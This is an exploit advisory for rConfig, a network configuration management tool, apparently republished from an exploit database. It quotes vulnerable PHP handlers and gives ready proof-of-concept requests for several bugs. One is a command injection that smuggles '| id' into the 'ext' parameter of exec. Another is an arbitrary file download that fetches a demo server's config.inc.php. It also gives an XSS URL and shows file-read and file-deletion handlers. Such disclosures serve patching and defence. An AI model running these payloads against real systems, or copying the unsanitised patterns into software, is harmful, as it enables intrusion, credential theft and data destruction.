###########################

# rConfig 3.1.1 <= 2.0 RCE & AFD & XSS Multiple Vulnerabilities

###########################

rConfig 3.1.1 <= 2.0 RCE & AFD & XSS Multiple Vulnerabilities
http://www.rconfig.com/

rConfig is a free open source network device configuration management utility for network engineers to take frequent configuration snapshots of their network devices. rConfig is unique, because you choose what commands you want to run against your devices. Simply configure rConfig with the list of commands you wish to apply to a category of devices, and add devices to the category. Create a scheduled task, and rConfig will do the rest. rConfig Version 3 now has a Configuration Compliance Management utility to enable you to monitor device configurations for policy compliance.

Vulnerabilities:

===========================================================================
===========================================================================

1. Remote Command Execution

File: lib/ajaxHandlers/ajaxArchiveFiles.php

<?php

$mainPath = $_GET['path'];
$archiveMainPath = $mainPath . "archive/";
$ext = "*." . $_GET['ext'];
$fullpath = $mainPath . $ext;

// create and archive dir if not already created
if (!is_dir($archiveMainPath)) {
mkdir("$archiveMainPath");
}

$today = date("Ymd");

$commandString = "sudo -u apache zip -r -j " . $archiveMainPath . "filename" . $today . ".zip " . $mainPath . $ext;

exec($commandString);

PoC:

/rconfig/www/lib/ajaxHandlers/ajaxArchiveFiles.php?path=/&ext=|%20id

2. Arbitrary file download

File: /www/lib/crud/downloadFile.php

<?php

// from here http://www.finalwebsites.com/forums/topic/php-file-download

$path = $_SERVER['DOCUMENT_ROOT'] . "/path2file/"; // change the path to fit your websites document structure
$fullPath = $_GET['download_file'];

if ($fd = fopen($fullPath, "r")) {
$fsize = filesize($fullPath);
$path_parts = pathinfo($fullPath);
$ext = strtolower($path_parts["extension"]);
switch ($ext) {
case "pdf":
header("Content-type: application/pdf"); // add here more headers for diff. extensions
header("Content-Disposition: attachment; filename="" . $path_parts["basename"] . """); // use 'attachment' to force a download
break;
default;
header("Content-type: application/octet-stream");
header("Content-Disposition: filename="" . $path_parts["basename"] . """);
}
header("Content-length: $fsize");
header("Cache-control: private"); //use this to open files directly
while (!feof($fd)) {
$buffer = fread($fd, 2048);
echo $buffer;
}
}
fclose($fd);
exit;
// example: place this kind of link into the document where the file download is offered:
// <a href="download.php?download_file=some_file.pdf">Download here</a>
?>

PoC v2:
http://demo.rconfig.com/v2/www/lib/crud/downloadFile.php?download_file=/home/r560544/demo/v2/config/config.inc.php

3. XSS:

http://demo.rconfig.com/v2/www/devicemgmt.php?deviceId=168&device=XSS

4. Arbitrary file read

File: lib/ajaxHandlers/ajaxGetFileByPath.php

<?php

// used to retrive contents of file specified in JS in devicemgmt.php
$filepath = $_GET['path'];

if (file_exists($filepath)) {
$fileArr = file($filepath);
} else {
$fileArr = 'Failed';
}
echo json_encode($fileArr);


?>

5. Arbitrary File Deletion

File: lib/ajaxHandlers/ajaxDeleteAllLoggingFiles.php

<?php

$path = $_GET['path'];
$ext = "*." . $_GET['ext'];
$fullpath = $path . $ext;

foreach (glob($fullpath) as $v) {
unlink($v);
}

$fileCount = count(glob($path . '*.' . $ext));

if ($fileCount > 0) {
$response = json_encode(array(
'failure' => true
));
} else {
$response = json_encode(array(
'success' => true
));
}

echo $response;

?>

(there is much more)

===========================================================================
===========================================================================

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2016-06-15]

###########################